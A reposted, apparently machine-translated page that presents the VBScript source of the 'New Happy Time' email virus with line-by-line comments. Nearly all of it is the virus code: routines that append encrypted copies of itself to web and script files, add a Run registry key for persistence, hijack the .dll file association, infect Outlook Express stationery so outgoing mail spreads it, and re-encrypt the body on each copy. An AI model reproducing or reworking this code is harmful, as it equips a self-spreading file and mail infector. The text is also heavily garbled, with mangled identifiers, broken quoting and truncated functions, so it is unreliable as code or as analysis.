[转] "New Happy Time" Virus Source Code Analysis

xiaoxiao2021-03-06  56

Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk Sub KJ_start () 'initialize variables KJSetDim ()' initialize the environment KJCreateMilieu () 'infected with a local or shared with html directory KJLikeIt ()' Infecting Outlook Mail Templates by VBS KJCreatemail () 'for viral propagation kjpropagate () End Sub

'Function: KjappendTO (FilePath, TypeStr) function: Additional Virus' parameters to the specified type of specified type:' filepath Specify file path 'TypeStr Specify type Function KjappendTO (FilePath, TypeStr) ON Error Resume Next' Open the specified method File SETTEMP = fso.opentextFile (FilePath, 1) 'Read the contents in the TMPSTR = ReadTemp.Readall' Decision file exists in the "kj_start ()" string, if there is an explanation that has been infected, exit function; 'If the file length is less than 1, the function is exited. IF INSTR (TMPSTR, "KJ_Start ()") <> 0 or Len (Tmpstr) <1 Then ReadTemp.close Exit Function End IF 'If the type of passed is "htt", loaded when the file header adds the call. Kj_start () function; 'Adding an HTML version of the encrypted virion body at the end of the file. 'If it is "html", load the kJ_Start () function and HTML version of the viral body when adding the call page;' If it is "VBS" 'in the file, add VBS version of the VBS version of VBS version of VBS version of VBS version of VBS = "htt" then ReadTemp.close Set FileTemp = Fso.OpenTextFile (FilePath, 2) FileTemp.write "<" & "Body οnlοad =" & "Vbscript:" & "KJ_Start ()" & "&" & Vbcrlf & Tmpstr & vbCrLf & htmlText FileTemp.Close Set FAttrib = fSO.GetFile (FilePath) FAttrib.attributes = 34 Else ReadTemp.Close Set FileTemp = fSO.OpenTextFile (FilePath, 8) If TypeStr = "html" Then FileTemp.Write vbCrLf & "<" & "HTML>" & VBCRLF & "<" & "Body οnlοad =" "&" VBScript: "&" kj_start () "" & "" & vbcrlf & HtmlText elseif typeStr = "VBS" THEN FileTemp.write VBCRLF & VBSTEXT END IF FileTemp.close End If End Function

'Function: KJChangeSub (CurrentString, LastIndexChar)' functions: changing the drive letter and subdirectory 'Parameters:' CurrentString current directory 'LastIndexChar a position in the current directory path Function KJChangeSub (CurrentString, LastIndexChar)' judges whether the root If LastIndexChar = 0 THEN 'If it is the root directory' If it is C: /, return to the FinalyDisk disk, and set the subs, ' LEFT (LCASTRING, 1) =

'Function: kjcreatemail () function: Infective mail section Function Kjcreatemail () on error resume next' If the current execution file is "html", exit function if infresse = "html" the exit function endiff "Take the system disk Path of the blank page ShareFile = Left (winpath, 3) & "program files / compon file / microsoft shared / stationery / blank.htm" "If this file is present, the viral body" of the HTML is to generate a viral body. This file IF (fso.fileexists (ShareFile)) THEN CALL KJAPPENDTO (Sharefile, "HTML") Else Set FileTemp = fso.opentextFile (ShareFile, 2, True) FileTemp.Write "<" "HTML>" & VBCRLF & " <"&" Body οnlοad = "" "Vbscript:" & "KJ_Start ()" "&" & vbrlf & HtmlText FileTemp.close End if 'gets the current user ID and Outlook version defaultiD = WSShell. RegRead ( "HKEY_CURRENT_USER / Identities / Default User ID") OutLookVersion = WsShell.RegRead ( "HKEY_LOCAL_MACHINE / Software / Microsoft / Outlook Express / MediaVer") 'function is activated stationery, stationery and infect all WsShell.RegWrite "HKEY_CURRENT_USER / Identities /" & DefaultId & "/ Software / Microsoft / Outlook Express /" & Left (OutlookVersion, 1) & ". 0 / Mail / Compose Useryry", 1, "REG_DWORD" CALL KJMAILREG ("HKEY_CURRENT_USER / IDENTIES /" & DefaultId & "/ Software / Microsoft / Outlook Express /" & Left (OutLookVersion, 1) & ". 0 / Mail / Stationery Name", ShareFile) Call KJMailReg ( "HKEY_CURRENT_USER / Identities /" & DefaultId & "/ Software / Microsoft / Outlook Express / "& Left (OutlookVersion, 1) &". 0 / mail / wide stationery name ", Sharefile) WSShell.Regwrite

HKEY_CURRENT_USER / Software / Microsoft / Office / 9.0 / Outlook / Options / Mail / EditorPreference ", 131072," REG_DWORD "Call KJMailReg (" HKEY_CURRENT_USER / Software / Microsoft / Windows Messaging Subsystem / Profiles / Microsoft Outlook Internet Settings / 0a0d020000000000c000000000000046 / 001e0360 ", "blank") Call KJMailReg ( "HKEY_CURRENT_USER / Software / Microsoft / Windows NT / CurrentVersion / Windows Messaging Subsystem / Profiles / Microsoft Outlook Internet Settings / 0a0d020000000000c000000000000046 / 001e0360", "blank") WsShell.RegWrite "HKEY_CURRENT_USER / Software / Microsoft / Office /10.0/Outlook/Options/Mail/EditorPreference",131072,"REG_DWORD "Call KJMailReg (" HKEY_CURRENT_USER / Software / Microsoft / Office / 10.0 / Common / MailSettings / NewStationery "," blank ") KJummageFolder (Left (WinPath, 3) & "Program Files / Stationry") End Function 'Function: KjcreateMilieu () Function: Create System Environment Function KjcreateMilieu () On Error ResMe Next Temppath = "" Judgment The operating system is NT / 2000 or 9X IF not (Fso.Fileexists (WinPath & "Wscript.exe)) THEN TEMPA TH = "System32 /" endiff "is confusing for the file name and does not conflict with the system file.

'If it is NT / 2000, the startup file is system / kernel32.dll' If it is 9X boot file is system / kernel.dll if temppath = "system32 /" damfile = winpath & "system / kernel32.dll" else startupfile = WinPath & "SYSTEM / Kernel.dll" End If 'Run add value, add just generated startup file path WsShell.RegWrite "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersion / Run / Kernel32", StartUpFile' file copy backup to early The original directory fso.copyfile WinPath & "Web / KJWALL.GIF", WinPath & "Web / Folder.htt" Fso.copyFile WinPath & "System32 / KJWALL.GIF", WinPath & "System32 / Desk.ini" 'to% WinDir% / Web / Folder.htt Additional Virus Call Kjappendto (WinPath & "Web / Folder.htt", "HTT") 'Change the DLL MIME header' Change the DLL's default icon 'Change DLL Open WSShell.Regwrite " HKEY_CLASSES_ROOT / .dll / "," dllfile "WsShell.RegWrite" HKEY_CLASSES_ROOT / .dll / Content Type "," application / x-msdownload "WsShell.RegWrite" HKEY_CLASSES_ROOT / dllfile / DefaultIcon / ", WsShell.RegRead (" HKEY_CLASSES_ROOT / vxdfile / Default.regwrite "hkey_classes_root / dllfile / scriptengine /", "vbscript" wsshell.regwrite "HKEY_CLASSES_ROOT / DLLFILE / Shell / Open / Command /" , WinPath & TempPath & "WScript.exe" "% 1" "% *" WsShell.RegWrite "HKEY_CLASSES_ROOT / dllFile / ShellEx / PropertySheetHandlers / WSHProps /", "{60254CA5-953B-11CF-8C96-00AA00B8708C}" WsShell.RegWrite "HKEY_CLASSES_ROOT / dllFile / ScriptHostEncode /", "{85131631-480C-11D2-B1F9-00C04F86C324}" viral load at startup file 'write virions Set FileTemp = fSO.OpenTextFile (StartUpFile, 2, true) FileTemp.Write VBSText filetemp.close end function

'Function: Kjlikeit () function: Processing for HTML files, if access is local or shared file, will infect this directory Function Kjlikeit ()' If the current execution file is not "html", exit the program if inwhere <> "html" throcation "If it is a local or online shared file if it is a local or online shared file if =" file "damization = MID (thisLocation, 9) ' This file extension is not empty, saving its path in thisLocation if fso.getExtensionName (thisLocation) <> "" "Location = left (thisLocation) - len (fso.getFileName (thisLocation)) endiff 'If the length of thisLocation is more than 3, it is more than 3. ) 'Features: If the registry specified key value does not exist, write to the specified file name' parameter: 'RegSTR Registry Specify key value' filename Specify file name Function Kjmailreg (Regstr, filename) on error resume next ' The registry specified key value does not exist, then writes the specified file name regtempstr = WSShell.regread (RegStr) if regtempstr = "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "

'Function: KJOboSub (CurrentString)' function: to traverse and return to the directory path 'parameter:' CurrentString current directory Function KJOboSub (CurrentString) SubE = 0 TestOut = 0 Do While True TestOut = TestOut 1 If TestOut> 28 Then CurrentString = FinalyDisk & ": /" EXIT DO END IF ON ERROR RESUME NEXT 'Gets all subdirectories of the current directory, and put thisfolder = fso.getfolder ("scripting.dictionary" set folders = thisfolder in dictionary .SubFolders FolderCount = 0 For Each TempFolder in Folders FolderCount = FolderCount 1 DicSub.add FolderCount, TempFolder.Name Next 'if there is no subdirectory, and it calls KJChangeSub back one level or replace the letter, and 1 If set SubE DicSub.Count = 0 Then LastIndexChar = InstrRev (CurrentString, "/", Len (CurrentString) -1) SubString = Mid (CurrentString, LastIndexChar 1, Len (CurrentString) -LastIndexChar-1) CurrentString = KJChangeSub (CurrentString, LastIndexChar) Sube = 1 else 'If there is a subdirectory' If SUBE is 0, turn currentstring to its first sub-directory if Sube = 0 Then CurrentString = CurrentString & DICSUB.Item (1) & "/" exit do else " Sube is 1, continue to pass the middle of the child, and return the next subdirectory to j = 0 for j = 1 to f olderCount If LCase (SubString) = LCase (DicSub.Item (j)) Then If j

'Function: KJPropagate ()' function: the virus spread Function KJPropagate () On Error Resume Next RegPathvalue = "HKEY_LOCAL_MACHINE / Software / Microsoft / Outlook Express / Degree" DiskDegree = WsShell.RegRead (RegPathvalue) 'If this key does not exist Degree, DiskDegree disc was FinalyDisk If DiskDegree = "" Then DiskDegree = FinalyDisk & ": /" End If 'following infection 5 DiskDegree set directory For i = 1 to 5 DiskDegree = KJOboSub (DiskDegree) KJummageFolder (DiskDegree) Next' infected Record Save WSShell.Regwrite RegpathValue, Diskdegree End Function

'Function: KJummageFolder (PathName)' function: infection specify the directory 'argument:' PathName specified directory Function KJummageFolder (PathName) On Error Resume Next 'get all the files in the directory set Set FolderName = FSO.GetFolder (PathName) Set ThisFiles = FolderName .Files httexists = 0 for Each thisfile in thisfiles fileext = ucase (fso.GETEXTENSITIONNAME (thisfile.path)) 'Judging the extension' If HTM, HTML, ASP, PHP, JSP adds the HTML version of the viral body in the file 'if it is If VBS adds VBS version of VBS version to the file, if it is htt, the flag is the existing HTT IF fileext = "HTM" OR FileExt = "HTML" OR FileExt = "ASP" OR FileExt = "PHP" OR FileExt = " JSP "THISFILE.PATH," HTML ") Elseif FileExt =" VBS "THEN CALL KJAPPENDTO (thisfile.path," VBS ") Elseif FileExt =" htt "Then Httexists = 1 end if next 'if The path is a desktop, and the flag is an already HTT IF (ucase (pathname) = ucase (ucase (pathname) = ucase (WinPath & "Desktop") Then Httexists = 1 End IF 'If there is no HTT' to add viral IF httexists = 0 dam = 0 THEN FSO.COPYFILE WINPATH & "System32 / Desktop.ini", Pathname Fso.copyFile WinPath & "Web / Folder.htt", Pathname End If End Function ' Function kjsetdim () 'Defines FSO, W SSHELL object 'gets the last available disk scroll' to generate the encrypted string of infection, web / folder.htt and system32 / desktop.ini function kjsetdim () on Error ResM32 / Desktop.ini function kjsetdim () on error resume next err.clear

'Test the current execution file is HTML or vbs Testit = wscript.scriptfullname if err dam inwhere = "html" else inwhere = "VBS" end if

'Shell to create a file access objects and objects If InWhere = "vbs" Then Set FSO = CreateObject ( "Scripting.FileSystemObject") Set WsShell = CreateObject ( "WScript.Shell") Else Set AppleObject = document.applets ( "KJ_guest") AppleObject .setCLSID ( "{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") AppleObject.createInstance () Set WsShell = AppleObject.GetObject () AppleObject.setCLSID ( "{0D43FE01-F093-11CF-8940-00A0C9054228}") AppleObject. CreateInstance () set fso = appleObject.getObject () end if set diskobject = fso.drives 'Judgment disk type' '0: unknown' 1: Removable '2: fixed' 3: NetWork '4: CD-ROM' 5: RAM Disk 'If you are not a movable disk or a fixed disk, you jump out of the loop. Pust may consider the network disk, CD-ROM, RAM Disk is a relatively releared position. Oh, if C: Is Ramdisk? For Each Disktemp.driveType <> 2 and diskTemp.driveType <> 1 THEN EXIT for end if firmyde-> 1 the exit for end if firmydisk = diskTemp.driveletter Next 'The previous viral body has been decrypted and stored in thistext, now in order to spread, Need to re-encrypted it. 'Encryption algorithm Dim Otherarr (3) randomize' randomly generates 4 operators for i = 0 to 3 OTHERARR (i) = int ((9 * rND)) Next Tempstring = "" for i = 1 to len (thistext) TEMPNUM = ASC (MID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (THID (0x0D, 1)) 'to do special processing if Tempnum = 13 TEMPNUM = 28 elseif Tempnum = 10 TEMPNUM = 29 End if' Simple encryption Processing, each character subtract the corresponding operator, then when decryption is decrypted, as long as the corresponding operator is added to each character in this order.

Tempchar = chr (Tempnum - Otherarr (I Mod 4)) IF Tempchar = CHR (34) Tempchar = Chr (18) end if Tempstring = Tempstring & Tempchar Next 'Strous of decryption algorithm Unlockstr = "Execute (" "" DIM Keyarr (3), THISTEXT "& VBCRLF &" "Keyarr (0) =" & Otherarr (0) & "& vbcrf &" Keyarr (1) = "& OtheRR (1) &" & vbcrlf & "Keyarr (2 ) = "& OTHERARR (2) &" "& vbrlf &" "Keyarr (3) =" & OTHERARR (3) & "" "& vbcrf &" "for i = 1 to len (exec" "& vbcrf &" tempnum = asc (MID (EXESTRING, I, 1) "" & Vbcrf & "" IF Tempnum = 18 "" & VBCRLF & "" Tempnum = 34 "" & VBCRLF & "" Endiff "& vbcrf &" Tempchar = CHR (Tempnum Keyarr (i mod) 4) "& vbrlf &" "If Tempchar = chr (28) THEN" "& ​​VBCRLF &" "Tempchar = VBCR" "& VBCRLF &" "Elseif Tempchar = CHR (29) THEN" & VBCRLF & "" Tempchar = VBLF "" & vbcrlf & "" Endiff "& vbcrlf &" "Thistext = THISTEXT & TEMPCHAR" "& vbcrlf &" "" & vbcrlf & "EXECUTE (THISTEXT) 'Copy the encrypted virus to the variable THisText thistext =" Exestring = "" & Tempstring & "" "'Generate scripts for HTML infection htmltext =" <"&" script language = vbscript> "& vbcrf &" document.write "&" "" & "<"

转载请注明原文地址:https://www.9cbs.com/read-114706.html

New Post(0)